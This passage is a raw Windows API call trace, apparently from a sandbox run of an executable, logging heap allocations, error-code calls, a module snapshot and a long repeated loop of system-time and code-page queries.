0x1d31ff0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x16) returned 0x1d32008 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x2a) returned 0x1d32028 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x29) returned 0x1d32060 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x15) returned 0x1d32098 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1e) returned 0x1d320b8 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x2a) returned 0x1d320e0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x12) returned 0x1d32118 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x18) returned 0x1d32138 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x46) returned 0x1d32158 [0079.317] HeapFree (in: hHeap=0x1d30000, dwFlags=0x0, lpMem=0x1d311f8 | out: hHeap=0x1d30000) returned 1 [0079.319] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x800) returned 0x1d321a8 [0079.319] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x80) returned 0x1d311f8 [0079.319] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0079.320] RtlSizeHeap (HeapHandle=0x1d30000, Flags=0x0, MemoryPointer=0x1d311f8) returned 0x80 [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.320] SetLastError (dwErrCode=0x0) [0079.320] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.321] SetLastError (dwErrCode=0x0) [0079.321] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.322] SetLastError (dwErrCode=0x0) [0079.322] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] SetLastError (dwErrCode=0x0) [0079.323] GetLastError () returned 0x0 [0079.323] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0079.324] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0079.324] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0079.324] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0079.326] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0079.326] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0079.327] GetTickCount () returned 0x1159a1e [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.327] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.327] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.327] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.328] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.328] GetACP () returned 0x4e4 [0079.328] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.329] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.329] GetACP () returned 0x4e4 [0079.329] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.330] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.330] GetACP () returned 0x4e4 [0079.330] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.331] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.331] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.331] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.331] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.331] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.331] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.331] GetACP () returned 0x4e4 [0079.332] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.332] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.332] GetACP () returned 0x4e4 [0079.332] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.332] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.332] GetACP () returned 0x4e4 [0079.332] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.332] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.332] GetACP () returned 0x4e4 [0079.332] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.332] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.332] GetACP () returned 0x4e4 [0079.332] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.333] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.333] GetACP () returned 0x4e4 [0079.333] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.334] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.334] GetACP () returned 0x4e4 [0079.335] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.335] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.335] GetACP () returned 0x4e4 [0079.335] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.335] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.335] GetACP () returned 0x4e4 [0079.335] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.335] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.335] GetACP () returned 0x4e4 [0079.335] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.335] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.335] GetACP () returned 0x4e4 [0079.335] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.335] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.335] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.336] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.336] GetACP () returned 0x4e4 [0079.336] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.337] GetACP () returned 0x4e4 [0079.337] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.337] GetACP () returned 0x4e4 [0079.337] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.337] GetACP () returned 0x4e4 [0079.337] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.337] GetACP () returned 0x4e4 [0079.337] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.337] GetACP () returned 0x4e4 [0079.337] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.337] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP () returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP () returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP () returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP () returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP () returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.338] GetACP 